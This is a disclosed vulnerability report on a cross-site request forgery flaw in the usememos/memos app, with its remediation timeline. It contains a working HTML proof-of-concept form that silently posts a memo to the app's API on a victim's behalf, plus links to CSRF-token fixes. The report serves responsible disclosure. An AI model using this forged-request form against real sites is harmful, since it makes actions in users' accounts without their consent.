Add any thoughts via CSRF in usememos/memos

Valid

Reported on

Dec 28th 2022

Description

An attacker can add any user thoughts via a CSRF attack

When you send a link to the victim and click on it, any thoughts will be added

Proof of Concept

1- When the attacker adds any thoughts, it then intercepts the request

2- Take this request to generate a CSRF PoC

<html>

  <!-- CSRF PoC - generated by Burp Suite Professional -->

  <body>

  <script>history.pushState('', '', '/')</script>

    <form action="https://demo.usememos.com/api/memo" method="POST" enctype="text/plain">

      <input type="hidden" name="&#123;&quot;content&quot;&#58;&quot;Test&#32;CSRF&quot;&#44;&quot;visibility&quot;&#58;&quot;PRIVATE&quot;&#44;&quot;resourceIdList&quot;&#58;&#91;&#93;&#125;" value="" />

      <input type="submit" value="Submit request" />

    </form>

  </body>

</html>

POC

https://drive.google.com/file/d/11Hec1H-61UpoOLVi55uWRpLBUMLVjRbi/view?usp=share_link

Some sources fix CSRF

Add CSRF Token

https://www.freecodecamp.org/news/csrf-protection-problem-and-how-to-fix-it

https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html

Impact

An attacker can add any user thoughts via a CSRF attack

We are processing your report and will contact the usememos/memos team within 24 hours. 12 days ago

STEVEN validated this vulnerability 11 days ago

samirwaleed has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

STEVEN marked this as fixed in 0.9.1 with commit c9bb2b 11 days ago

STEVEN has been awarded the fix bounty

This vulnerability has been assigned a CVE

STEVEN published this vulnerability 11 days ago

to join this conversation